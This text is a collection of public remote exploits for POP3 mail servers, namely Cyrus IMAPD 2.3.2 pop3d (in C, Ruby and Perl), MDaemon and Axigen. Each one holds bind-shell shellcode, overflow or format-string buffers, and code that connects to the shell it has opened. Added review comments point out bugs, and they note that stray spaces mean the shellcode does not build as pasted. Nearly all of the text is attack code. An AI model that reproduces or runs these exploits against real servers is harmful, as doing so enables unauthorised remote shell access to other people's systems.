 * BINDPORT (13370) after every attempt, so this is presumably the listener
 * the payload opens.  NOTE(review): one escape per line carries a
 * forum-inserted space ("\x e1"), which is a compile error, so the listing
 * does not build as pasted. */
unsigned char shellcode[] =
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\x e1\xcd\x80\x96"
"\x43\x52\x66\x68\x34\x3a\x66\x53\x89\xe1\x6a\x66\x 58\x50\x51\x56"
"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x 56\x43\x89\xe1"
"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x 49\x79\xf9\xb0"
"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x 89\xe3\x52\x53"
"\x89\xe1\xcd\x80";

/* Open a TCP connection to remotehost:port.
 *
 * hostent/addr/done are static so a hostname is resolved at most once per
 * process: `done` is set after the first successful connect and suppresses
 * later lookups (a failed connect leaves done == 0, so the name is resolved
 * again).  If remotehost is a dotted-quad, inet_aton() fills sin_addr directly.
 *
 * Returns the socket, or -1 on failure.  "connect() failed" is only printed
 * for POP3PORT so the repeated BINDPORT probes in main() stay quiet.  The
 * close(s) on the socket() failure path runs with s == -1 (harmless EBADF).
 */
int do_connect (char *remotehost, int port)
{
static struct hostent *host;
static struct sockaddr_in addr;
static int done=0;
int s;

if (!inet_aton(remotehost, &addr.sin_addr) && (done != 1))
{
host = gethostbyname(remotehost);
if (!host)
{
perror("gethostbyname() failed");
return -1;
}
addr.sin_addr = *(struct in_addr*)host->h_addr;
}

s = socket(PF_INET, SOCK_STREAM, 0);
if (s == -1)
{
close(s);
perror("socket() failed");
return -1;
}

addr.sin_port = htons(port);
addr.sin_family = AF_INET;

if (connect(s, (struct sockaddr*)&addr, sizeof(addr)) == -1)
{
close(s);
if (port == POP3PORT) perror("connect() failed");
return -1;
}

done=1;
return s;
}

/* Build and send one attempt using the given return address.
 *
 * nops is 352 'A' bytes and nops2 90, both NUL-terminated; the USER line is
 * 5 + 352 + 84 + 90 + 2 bytes, well inside exploitbuffer.  The last four
 * bytes of the line -- the final two filler bytes and the "\r\n" -- are
 * replaced by returnaddr in little-endian order, so no line terminator is
 * actually sent.
 *
 * Review notes:
 *  - the greeting is consumed one byte at a time until a CR or LF, but the
 *    recv() result is never checked; if the peer closes first, recvbuf[0]
 *    is never written (it is uninitialised) and the loop can spin forever.
 *    do_checkvulnerable() has the same pattern.
 *  - strlen() is re-evaluated after each store and again for send(), so a
 *    zero byte anywhere in returnaddr truncates the line at that point.
 *  - the final recv() result is discarded.
 */
void do_exploit(int sock, unsigned int returnaddr)
{
char nops[360];
char nops2[100];
char exploitbuffer[1024];
char recvbuf[30];

memset(&nops[0], '\0', sizeof(nops));
memset(&nops[0], 'A', 352);
memset(&nops2[0], '\0', sizeof(nops2));
memset(&nops2[0], 'A', 90);

while (1) {
recv(sock, recvbuf, 1, 0);
if ((recvbuf[0] == '\r') || (recvbuf[0] == '\n')) break;
}

sprintf(exploitbuffer, "USER %s%s%s\r\n", nops, shellcode, nops2);

exploitbuffer[strlen(exploitbuffer)-1] = (returnaddr >> 24) & 0xff;
exploitbuffer[strlen(exploitbuffer)-2] = (returnaddr >> 16) & 0xff;
exploitbuffer[strlen(exploitbuffer)-3] = (returnaddr >> 8) & 0xff;
exploitbuffer[strlen(exploitbuffer)-4] = (returnaddr) & 0xff;

send(sock, exploitbuffer, strlen(exploitbuffer), 0);
recv(sock, recvbuf, sizeof(recvbuf)-1, 0);
}

/* Probe whether the server survives a ~1 KB USER argument.
 *
 * checkbuffer layout: 'A' in [0..1021], "USER " written over the first five
 * bytes, "\r\n" at [1021..1022].  Note that [1023] is never written -- the
 * first memset covers only 1023 bytes -- so the strlen() used for send()
 * relies on that byte happening to be zero.
 *
 * After the greeting is consumed (same unchecked recv() loop as in
 * do_exploit()), MSG_WAITALL blocks until 9 reply bytes arrive or the
 * connection drops.  The return convention is inverted relative to the name:
 * 0 means the reply was short (connection gone, treated as vulnerable), -1
 * means the server answered normally.  main() tests for -1.
 */
int do_checkvulnerable(int sock) {
char checkbuffer[1024];
char recvbuffer[10];

memset(&checkbuffer[0], '\0', sizeof(checkbuffer)-1);
memset(&checkbuffer[0], 'A', sizeof(checkbuffer)-2);
checkbuffer[0]='U';
checkbuffer[1]='S';
checkbuffer[2]='E';
checkbuffer[3]='R';
checkbuffer[4]=' ';
checkbuffer[sizeof(checkbuffer)-3]='\r';
checkbuffer[sizeof(checkbuffer)-2]='\n';

while (1) {
recv(sock, recvbuffer, 1, 0);
if ((recvbuffer[0] == '\r') || (recvbuffer[0] == '\n')) break;
}

send(sock, checkbuffer, strlen(checkbuffer), 0);

if (recv(sock, recvbuffer, sizeof(recvbuffer)-1, MSG_WAITALL) < 3)
return 0;

return -1;
}

/* Relay loop between stdin/stdout and sockfd using select().
 *
 * Declared int but never returns a value -- control falls off the end when
 * either side hits EOF or an error, which is undefined behaviour for a
 * non-void function (main() ignores the result anyway).  write() results
 * are not checked for short writes, and the EWOULDBLOCK/EAGAIN tests are
 * moot because neither descriptor is set non-blocking.
 */
int do_remote_shell(int sockfd)
{
while(1)
{
fd_set fds;
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sockfd,&fds);
if(select(FD_SETSIZE,&fds,NULL,NULL,NULL))
{
int cnt;
char buf[1024];
if(FD_ISSET(0,&fds))
{
if((cnt=read(0,buf,1024))<1)
{
if(errno==EWOULDBLOCK||errno==EAGAIN)
continue;
else
break;
}
write(sockfd,buf,cnt);
}
if(FD_ISSET(sockfd,&fds))
{
if((cnt=read(sockfd,buf,1024))<1)
{
if(errno==EWOULDBLOCK||errno==EAGAIN)
continue;
else
break;
}
write(1,buf,cnt);
}
}
}
}

/* Entry point: argv[1] host, argv[2] start address (hex, at most 8 digits).
 *
 * remotehost is a 255-byte stack buffer filled by strcpy() from argv[1] with
 * no length check -- the author's "//uhoho" marks it.  do_connect()'s result
 * is handed to do_checkvulnerable() without testing for -1.  The loop then
 * steps the address by 16 up to 0xbfffffff, sends one attempt per value and
 * probes BINDPORT twice; close(s2) is reached with s2 == -1 on each failed
 * probe.  printf("%4x") prints the full value despite the width hint.
 */
int main(int argc, char **argv)
{
char remotehost[255];
int s,s2,i;
unsigned int returnaddr;

printf("cyrus pop3d remote exploit [kcope/2006]\n");

if (argc < 3) {
printf("usage: %s <remote host> <brute force start return address>\n", argv[0]);
printf("eg: %s localhost bfffa000\n", argv[0]);
return 1;
}

strcpy(remotehost, argv[1]); //uhoho
if (sscanf(argv[2], "%8x", &returnaddr) == 0) {
printf("Specify valid start return address\n");
return 1;
}

printf("Checking if vulnerable... ");
s=do_connect(remotehost, POP3PORT);
if (do_checkvulnerable(s) == -1) {
close(s);
printf("\ncyrus pop3d seems not to be vulnerable\nno popsubfolders defined at remote host?\n");
return 1;
}
close(s);
printf("SUCCESS!\n");

while (returnaddr < 0xbfffffff) {
returnaddr+=16;

printf("CRACKADDR = %4x\n", returnaddr);
fflush(stdout);
s=do_connect(remotehost, POP3PORT);
if (s==-1)
return 1;

do_exploit(s, returnaddr);
for (i=0;i<2;i++) {
if ((s2=do_connect(remotehost, BINDPORT)) != -1) {
printf("\nALEX,ALEX WE GOT IT!!!\n");
do_remote_shell(s2);
return 0;
}
close(s2);
}

close(s);
}

return 0;
}

// [2006-05-21]


110 Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (2)



#!/usr/bin/ruby
#
# cyrus-imapd pop3d exploit
# by bannedit
#
# 05/23/2006
# This exploit takes advantage of a stack based overflow.
# Once the stack corruption has occured it is possible
# to overwrite a pointer which is later used for a memcpy
# this gives us a write anything anywhere condition similar
# to a format string vulnerability.
#
# I choose to overwrite the GOT table with my shellcode and
# return to it. This defeats the VA random patch and possibly
# other stack protection features.
#
# tested on gentoo-sources linux 2.6.16



require 'socket'

#will add targets for other linux distros
# Target table keyed by platform; only the 'linux 2.6' entry is populated.
targets = { 'linux 2.6' => '0x080fd318', 'linux 2.6 Hardened' => '', 'freebsd' => '' }


#metasploit bind shellcode by skape 84 bytes port 4444#
# NOTE(review): one escape per line carries a forum-inserted space ("\x e1"),
# which Ruby rejects as an invalid hex escape, so the file does not parse as pasted.

shellcode =
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\x e1\xcd\x80\x96"+
"\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x 58\x50\x51\x56"+
"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x 56\x43\x89\xe1"+
"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x 49\x79\xf9\xb0"+
"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x 89\xe3\x52\x53"+
"\x89\xe1\xcd\x80"


puts "--[cyrus imapd pop3 popsubfolders exploit"
puts "----[by bannedit"
puts "-----------------------------------------"

# Argument handling.  With two arguments `ret` is parsed from ARGV[1] but is
# overwritten unconditionally a few lines below, so a user-supplied address
# is silently ignored.  Three or more arguments match no branch, `sock` is
# never assigned, and the first use raises NameError.  "pop3" is resolved as
# a service name.
case ARGV.length

when 0
puts "--- ./exploit [host] [options]"
exit

when 1
sock = TCPSocket.new(ARGV[0], "pop3")

when 2
sock = TCPSocket.new(ARGV[0], "pop3")
ret = ARGV[1].hex

end

ret = (targets['linux 2.6'].hex)

# The assignment binds as the right operand of `+`, so the greeting lands in
# `banner` and is echoed.  sock.gets returns nil if the server closes at once,
# and the `+` then raises TypeError.
puts "<- " + banner = sock.gets
puts "-> sending USER command"
printf " injecting shellcode: %d bytes\n", shellcode.length


#this alignment stuff should probably be cleaned up its kinda icky#
# USER argument: 265 filler bytes, the address twice, filler plus payload
# padded to 250 bytes, 29 more filler bytes, then (ret - 277) four times.
# ret is reassigned in the middle of building the buffer.

evil_buff = "USER "
evil_buff <<"\x90" * 265 #(290 - shellcode.length)

evil_buff << ([ret].pack('V')) * 2 #return address
evil_buff <<"\x90" * (250 - shellcode.length)
evil_buff << shellcode
evil_buff <<"\x90" * (29)
ret = ret - 277
evil_buff << ([ret].pack('V')) * 4 #0x080fd204
evil_buff <<"\r\n"

sock.send(evil_buff, 0)

sleep 9
puts " attempting to connect to #{ARGV[0]} port 4444"

# Shells out with the host interpolated into a command string: an argument
# containing shell metacharacters is interpreted by /bin/sh.  The list form
# system('nc', ARGV[0], '4444') would bypass the shell.  The result of
# system() is not checked.
cmd = "nc #{ARGV[0]} 4444"
system(cmd)

sock.close

# [2006-07-21]


110 Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (3)



#!/usr/bin/perl
## Creator: K-sPecial (xzziroz.net) of .aware (awarenetwork.org)
## Name: bid-18056.pl
## Date: 08/12/2006
##
## Description: this is yet another exploit for the cyrus pop3d buffer overflow. I tried both public
## exploits and neither of them worked (not that they don't but coding my own is generally faster
## and easier) so I coded my own. The exploit by kcope seems to be done right and maybe i just got really
## unlucky and missed the offset in between the 5 runs i gave it. The one from bannedit was interesting...
## really nice idea about overwriting the pointer and sticking your shellcode in GOT. Only problem is that
## when i was writing this exploit with the same method, and i placed my shellcode in GOT, functions before
## the return from the vuln function were segfaulting first by trying to actually *use* the GOT! So what I have
## done here is used the same method, yet found a data area that is not going to freak pop3d
## out before it gets to the return. Specifically I use part of the .data segment (or was it .bss, anyways) labeled
## 'buf'. With this the same one-offset-per-machine is gained that bannedit was achieving.
##
## Other: Basically what all this means, is you just have to give an offset that is a location in memory that
## is writable and executable (anything in .data, .bss, .stack, .heap, etc) and make sure it's not something
## that will need to be used by functions in pop3d before popd_canon_user() returns and hence executes your
## shellcode (because it'll segfault and won't get executed).
##
## Note: bindport is 13370
#################################################################################################################
use IO::Socket;
use strict;

# Arguments: target host and a hex offset.  A missing (or "0"/empty) value
# falls through to help(), which exits; help() is defined further down, which
# is fine since the call uses parentheses.
my $host = $ARGV[0] || help();
my $offset = $ARGV[1] || help();
my $port = 110;

# stolen from cyruspop3d.c because this actually worked, i couldn't get any
# metasploit sc to work (as usual, hmph)
# NOTE(review): one escape per line carries a forum-inserted space ("\x e1"),
# so the string does not hold the intended bytes as pasted.
my $shellcode =
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\x e1\xcd\x80\x96".
"\x43\x52\x66\x68\x34\x3a\x66\x53\x89\xe1\x6a\x66\x 58\x50\x51\x56".
"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x 56\x43\x89\xe1".
"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x 49\x79\xf9\xb0".
"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x 89\xe3\x52\x53".
"\x89\xe1\xcd\x80";

# Proto defaults to TCP when omitted; $! carries the connect error for die().
my $sock = IO::Socket::INET->new('PeerAddr' => $host,
'PeerPort' => $port) or die ("-!> unable to connect to '$host:$port': $!\n");

$sock->autoflush();

# One USER line, written in pieces.  pack('l') is a native-endian signed
# 32-bit value, so the bytes depend on the host running the script; hex()
# accepts an optional "0x" prefix.  Only "\n" terminates the line, no reply
# is read, and the socket is closed implicitly at exit.
print $sock "USER "; ## begin USER command with just that
print $sock "$shellcode"; ## shellcode is *userbuf is *user
print $sock pack('l', hex($offset)) x 120; ## location overwrites EIP and *out, userbuf/user written to *out
print $sock "\n"; ## that simple

# Print usage and the one known offset, then exit.  Always exits with status 0,
# even though it is only reached when a required argument is missing.
sub help {
print "bid-18056.pl by K-sPecial (xzziroz.net) of .aware (awarenetwork.org)\n";
print "08/12/2006\n\n";
print "perl $0 \$host \$offset\n\n";

print "Offsets: \n";
print "0x8106c20 (debian 3.1 - 2.6.16-rc6)\n";

exit(0);
}

# [2006-08-14]



110 MDaemon POP3 Server < 9.06 (USER) Remote Heap Overflow Exploit



#!/usr/bin/python
import sys
import struct
import socket
from time import sleep
########################################################################################
# MDaemon Pre Authentication (USER) Heap Overflow
# Code based on Leon Juranic's exploit
# Coded by muts - [email protected]
# http://www.hackingdefined.com
# http://www.remote-exploit.org
# Tested on:
# Mdaemon 9.0.5
# Mdaemon 7.2.3
# Mdaemon 7.2.2
# Mdaemon 7.2.1
# Mdaemon 7.2.0
# Possibly Others
# PLEASE CONTINUE READING !
# Huge greets to xbxice and talz for leading me away from the darkness
########################################################################################
# Mdaemon is weird. It seems like their developers decided to annoy everyone
# by making their software do unexpected things.
# The exploit overwrites UnhandledExceptionFilter, and jumps to an egghunter
# shellcode - which then scans the memory, and executes a bindshell on port 4444.
#
# On some Win2k SP4 machines, I found SetUnhandledExceptionFilter at 0x00000214,
# for which I unfortunately had no explanation.
# I later found out that these machines were fully patched ...
# After inspecting kernel32.dll from my SP4 (not fully patched) and comparing it to
# todays' version, I noticed that the SetunhandledExceptionFilter function had changed,
# and looks suspiciously similar to XP SP2...
# Note that my unpatched win2k was last patched 2-3 weeks ago,
# so I suspect this change is recent.
# The end of easy UnhandledExceptionFilter exploitation on Win2k ?
#
# So, this is a partially working exploit, on unpatched win2k boxes....
# Kiddies, treat this exploit as DOS :)
#
# I got 3 types of results with this code:
#
# 1. Shell :)
# 2. Mdaemon process shoots up to 100%, scanning memory for shellcode that isn't there.
# 3. Plain ugly crash - oh well.
#
# At minimum, I'd check the UnhandledExceptionFilter address before running the exploit.
########################################################################################
#
# C:\Documents and Settings\muts>nc -v 192.168.220.128 4444
# 97DACBEC7CA4483 [192.168.220.128] 4444 (?) open
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:\MDaemon\APP>
########################################################################################

# Python 2 code (print statement, byte strings).  The target is hard-coded;
# there is no argument parsing and no error handling, so a refused connection
# or a reset mid-transfer raises an uncaught socket.error.
host="192.168.220.128"

# 32-bit little-endian values for the addresses discussed in the header
# (Win2k SP4, unpatched).  The header itself says these should be checked
# against the target build before use.
ret = struct.pack("<L",0x7c2f62b6) # 7c2f62b6 advapi.dll JMP ESI+48 SP4 No Patches
ueh = struct.pack("<L",0x7C54144C) # SetUnhandledExceptionFilter 0x7C54144C win2k SP4 No Patches
tap = struct.pack("<L",0xeb169090) # Short Jump over some garbage

# skape's egghunter shellcode
# NOTE(review): one escape per line carries a forum-inserted space ("\x db"),
# which is an invalid escape in Python 2, so the file does not compile as pasted.

egghunter ="\xeb\x21\x59\xb8\x74\x30\x30\x77\x51\x6a\xff\x33\x db\x64\x89\x23"
egghunter +="\x6a\x02\x59\x8b\xfb\xf3\xaf\x75\x07\xff\xe7\x66\x 81\xcb\xff\x0f"
egghunter +="\x43\xeb\xed\xe8\xda\xff\xff\xff\x6a\x0c\x59\x8b\x 04\x0c\xb1\xb8"
egghunter +="\x83\x04\x08\x06\x58\x83\xc4\x10\x50\x33\xc0\xc3"

# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum
# Per the inline comment, the first bytes are the "t00wt00w" marker the
# egghunter above searches for.  Same forum garbling as the other strings.

shellcode ="\x90\x90\x74\x30\x30\x77\x74\x30\x30\x77" # t00wt00w (!)
shellcode +="\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x 49\x49\x49\x49"
shellcode +="\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x 41\x30\x42\x36"
shellcode +="\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x 44\x42\x48\x34"
shellcode +="\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x 30\x41\x44\x41"
shellcode +="\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x 4c\x56\x4b\x4e"
shellcode +="\x4d\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x 42\x36\x4b\x38"
shellcode +="\x4e\x46\x46\x52\x46\x42\x4b\x48\x45\x34\x4e\x53\x 4b\x48\x4e\x57"
shellcode +="\x45\x50\x4a\x47\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x 4a\x41\x4b\x48"
shellcode +="\x4f\x45\x42\x52\x41\x30\x4b\x4e\x49\x34\x4b\x58\x 46\x33\x4b\x48"
shellcode +="\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x 46\x38\x42\x4c"
shellcode +="\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x 44\x4c\x4b\x4e"
shellcode +="\x46\x4f\x4b\x53\x46\x45\x46\x32\x4a\x52\x45\x37\x 45\x4e\x4b\x38"
shellcode +="\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x36\x4b\x58\x 4e\x30\x4b\x54"
shellcode +="\x4b\x58\x4f\x45\x4e\x31\x41\x50\x4b\x4e\x43\x50\x 4e\x42\x4b\x38"
shellcode +="\x49\x58\x4e\x46\x46\x52\x4e\x31\x41\x46\x43\x4c\x 41\x53\x4b\x4d"
shellcode +="\x46\x56\x4b\x58\x43\x44\x42\x33\x4b\x48\x42\x54\x 4e\x30\x4b\x38"
shellcode +="\x42\x57\x4e\x51\x4d\x4a\x4b\x58\x42\x54\x4a\x50\x 50\x45\x4a\x46"
shellcode +="\x50\x48\x50\x34\x50\x30\x4e\x4e\x42\x35\x4f\x4f\x 48\x4d\x48\x56"
shellcode +="\x43\x35\x48\x46\x4a\x56\x43\x43\x44\x43\x4a\x36\x 47\x47\x43\x57"
shellcode +="\x44\x33\x4f\x45\x46\x45\x4f\x4f\x42\x4d\x4a\x46\x 4b\x4c\x4d\x4e"
shellcode +="\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x55\x 49\x38\x45\x4e"
shellcode +="\x48\x36\x41\x58\x4d\x4e\x4a\x30\x44\x30\x45\x55\x 4c\x36\x44\x50"
shellcode +="\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x 4d\x4a\x47\x55"
shellcode +="\x4f\x4f\x48\x4d\x43\x45\x43\x55\x43\x45\x43\x35\x 43\x55\x43\x34"
shellcode +="\x43\x45\x43\x44\x43\x45\x4f\x4f\x42\x4d\x48\x36\x 4a\x56\x41\x51"
shellcode +="\x4e\x35\x48\x46\x43\x35\x49\x38\x41\x4e\x45\x39\x 4a\x46\x46\x4a"
shellcode +="\x4c\x51\x42\x37\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x 4c\x36\x42\x51"
shellcode +="\x41\x35\x45\x55\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x 4d\x4a\x50\x42"
shellcode +="\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x55\x 4f\x4f\x42\x4d"
shellcode +="\x4a\x46\x45\x4e\x49\x44\x48\x48\x49\x34\x47\x55\x 4f\x4f\x48\x4d"
shellcode +="\x42\x35\x46\x35\x46\x35\x45\x45\x4f\x4f\x42\x4d\x 43\x49\x4a\x56"
shellcode +="\x47\x4e\x49\x57\x48\x4c\x49\x47\x47\x55\x4f\x4f\x 48\x4d\x45\x45"
shellcode +="\x4f\x4f\x42\x4d\x48\x56\x4c\x56\x46\x56\x48\x56\x 4a\x46\x43\x46"
shellcode +="\x4d\x46\x49\x38\x45\x4e\x4c\x46\x42\x55\x49\x55\x 49\x32\x4e\x4c"
shellcode +="\x49\x38\x47\x4e\x4c\x36\x46\x34\x49\x58\x44\x4e\x 41\x33\x42\x4c"
shellcode +="\x43\x4f\x4c\x4a\x50\x4f\x44\x34\x4d\x52\x50\x4f\x 44\x34\x4e\x42"
shellcode +="\x43\x59\x4d\x58\x4c\x57\x4a\x53\x4b\x4a\x4b\x4a\x 4b\x4a\x4a\x56"
shellcode +="\x44\x37\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x47\x 46\x44\x4f\x4f"
shellcode +="\x48\x4d\x4b\x35\x47\x45\x44\x55\x41\x55\x41\x55\x 41\x55\x4c\x56"
shellcode +="\x41\x50\x41\x45\x41\x35\x45\x45\x41\x55\x4f\x4f\x 42\x4d\x4a\x56"
shellcode +="\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x45\x4f\x4f\x 48\x4d\x4c\x46"
shellcode +="\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x58\x 47\x55\x4e\x4f"
shellcode +="\x43\x38\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x35\x 4f\x4f\x42\x4d"
shellcode +="\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x35\x43\x55\x 4f\x4f\x48\x4d"
shellcode +="\x4f\x4f\x42\x4d\x5a"

# Second-stage USER argument: three marker bytes, the three packed values with
# filler between them, 90 bytes of 0x90, the egghunter and 346 trailing bytes.
buffer ="AAA"+tap+"BBBB"+ret+ueh+"\x90"*90 +egghunter+"C"*346

# Phase 1: five connections, each sending one ~13 KB USER line that carries
# the payload, then QUIT.  Server replies are printed but never inspected.
for x in range(5):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,110))
data=s.recv(1024)
print data
s.send('USER '+'@A' * 1600 + '\x90'*5945 + shellcode +'D'*3711 + '\r\n')
s.send('QUIT\r\n')
s.close()
sleep(1)

# Phase 2, performed twice: a shorter USER line carrying `buffer`, then a
# second oversized USER line; the connection is closed without QUIT.  The
# same code is pasted twice rather than looped.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,110))
data=s.recv(1024)
print data
s.send('USER ' + '@A@A'+ buffer + '\r\n')
data=s.recv(1024)
print data
s.send('USER ' + 'A' * 3370 + '\r\n')
s.close()

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,110))
data=s.recv(1024)
print data
s.send('USER ' + '@A@A'+ buffer + '\r\n')
data=s.recv(1024)
print data
s.send('USER ' + 'A' * 3370 + '\r\n')
s.close()
# Trailing pause after the last close() has no effect on anything above.
sleep(1)

# [2006-08-26]


110 Axigen eMail Server 2.0.0b2 (pop3) Remote Format String Exploit



/* axiagen.c
*
* Axigen eMail Server v2.0 (beta)
* by fuGich Tue Dec 5 2006
*
* thanks to mu-b
*
* - Tested on: Axigen V2 (beta)
*
* logType for the pop3 service must be "system" and
* the logLevel set to any number with 4th bit set
*
* remote shell format string vulnerability in pop3
* /bin/sh to bind to port 31337
*
* optimised format string generated with libforSC
* used hhn for writes, could have been hn's but this was small enough and reduces size of log entry generated
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>


#define DEF_PORT 110
#define PORT_POP3 DEF_PORT


/*
 * Payload that formatme() writes, unmodified, as the very first bytes of the
 * POP3 session.  As annotated line by line below it consists of: a short
 * "plt fixup" stub, a 98-byte fork/bind shell for TCP 31337, nine 4-byte
 * write addresses, and finally the printf-style directives.  The directives
 * rely on positional %n / %hhn conversions; data reaching a logging printf()
 * as the *format* argument is the root cause (the file header says this only
 * happens when logType is "system" and logLevel has the 4th bit set).
 *
 * Defensive notes (from what is visible here):
 *  - No legitimate POP3 client sends "%NNu%NN$n" / "$hhn" sequences in a
 *    command line; their presence in the first line of a session is a
 *    high-confidence indicator for this class of attack.
 *  - Every address is hard-coded (0x0985bed8 / 0x0985bee0 and the value
 *    0x804f09a written there), so the payload is specific to one build and
 *    layout; any relocation of the process image defeats it.
 *  - The last line of the literal, as reproduced on this page, contains
 *    stray spaces ("$ hhn", "\r \n") from line wrapping, so this copy does
 *    not encode the directives the comments describe.
 */
char formatString[] =

// plt fixup code

"\xba\xd8\xbe\x85\x09" // mov $0x985bed8,%edx
"\xc7\x02\x9a\xf0\x04\x08" // movl $0x804f09a,(%edx)
"\x8d\x52\x04" // lea 0x4(%edx),%edx
"\xc6\x02\xaa" // movb $0xaa,(%edx)
"\x90\x90\x90" // make divisible by 8

//
// bind shell with fork to port 31337 98 bytes
//

"\x6a\x66" // push $0x66
"\x58" // pop %eax
"\x99" // cltd
"\x6a\x01" // push $0x1
"\x5b" // pop %ebx
"\x52" // push %edx
"\x53" // push %ebx
"\x6a\x02" // push $0x2

//
// <_doint>:
//

"\x89\xe1" // mov %esp,%ecx
"\xcd\x80" // int $0x80

"\x5b" // pop %ebx
"\x5d" // pop %ebp
"\x52" // push %edx
"\x66\xbd\x69\x7a" // mov $0x7a69,%bp (0x7a69 = 31337)
"\x0f\xcd" // bswap %ebp
"\x09\xdd" // or %ebx,%ebp
"\x55" // push %ebp
"\x6a\x10" // push $0x10
"\x51" // push %ecx
"\x50" // push %eax
"\x89\xe1" // mov %esp,%ecx
"\xb0\x66" // mov $0x66,%al
"\xcd\x80" // int $0x80
"\xb3\x04" // mov $0x4,%bl
"\xb0\x66" // mov $0x66,%al
"\xcd\x80" // int $0x80

//
// <_acceptloop>:
//

"\x5f" // pop %edi
"\x50" // push %eax
"\x50" // push %eax
"\x57" // push %edi
"\x89\xe1" // mov %esp,%ecx
"\x43" // inc %ebx
"\xb0\x66" // mov $0x66,%al
"\xcd\x80" // int $0x80
"\x93" // xchg %eax,%ebx
"\xb0\x02" // mov $0x2,%al
"\xcd\x80" // int $0x80
"\x85\xc0" // test %eax,%eax
"\x75\x1a" // jne <_parent>
"\x59" // pop %ecx

//
// <_dup2loop>:
//

"\xb0\x3f" // mov $0x3f,%al
"\xcd\x80" // int $0x80
"\x49" // dec %ecx
"\x79\xf9" // jns <_dup2loop>

"\xb0\x0b" // mov $0xb,%al
"\x68\x2f\x2f\x73\x68" // push $0x68732f2f
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
"\x89\xe3" // mov %esp,%ebx
"\x52" // push %edx
"\x53" // push %ebx
"\xeb\xb2" // jmp <_doint>

//
// <_parent>:
//

"\x6a\x06" // push $0x6
"\x58" // pop %eax
"\xcd\x80" // int $0x80
"\xb3\x04" // mov $0x4,%bl
"\xeb\xc9" // jmp <_acceptloop>

//
// 9 write addresses
//

"\xd8\xbe\x85\x09" // pointer @ 0x0985bed8
"\xd9\xbe\x85\x09"
"\xda\xbe\x85\x09"
"\xdb\xbe\x85\x09"
"\xe0\xbe\x85\x09" // place shell code @ 0x0985bee0
"\xe1\xbe\x85\x09"
"\xe2\xbe\x85\x09"
"\xe3\xbe\x85\x09"
"\xe4\xbe\x85\x09"

// add the format string
// (positional %n/%hhn writes; see the note above about the stray spaces)

"%18u%66$n%34u%65$hhn%31u%72$hhn%10u%68$hhn%31u%71$ hhn%87u%70$hhn%14u%69$hhn%90u%73$hhn%158u%67$hhn\r \n";


static int sock_send (int sock, u_char * src, int len);
static void formatme (u_char * host);
static int sockami (u_char * host, int port);
void shell (int sock);

/*
 * Relay bytes between the local terminal (fd 0 / fd 1) and `sock` until
 * either side closes.  formatme() calls this with the connection to port
 * 31337.  Never returns: every exit path is exit(EXIT_FAILURE).
 *
 * NOTE(review): `rfds` is never cleared with FD_ZERO(), so its first
 * contents are whatever happened to be on the stack; the return values of
 * select() and write() are also unchecked.
 */
void shell (int sock){ /* Attach to Remote Shell */

int l;
char buf[512];
fd_set rfds;

while (1) {
/* re-arm both descriptors every pass; select() rewrites the set */
FD_SET (0, &rfds);
FD_SET (sock, &rfds);
select (sock + 1, &rfds, NULL, NULL, NULL);
if (FD_ISSET (0, &rfds)) {
/* local input -> remote; EOF or error on stdin ends the session */
l = read (0, buf, sizeof (buf));
if (l <= 0) {
printf("\n - Connection closed by local user\n");
exit (EXIT_FAILURE);
}
write (sock, buf, l);
}
if (FD_ISSET (sock, &rfds)) {
/* remote output -> stdout; 0 means the peer closed, <0 is a read error */
l = read (sock, buf, sizeof (buf));
if (l == 0) {
printf ("\n - Connection closed by remote host.\n");
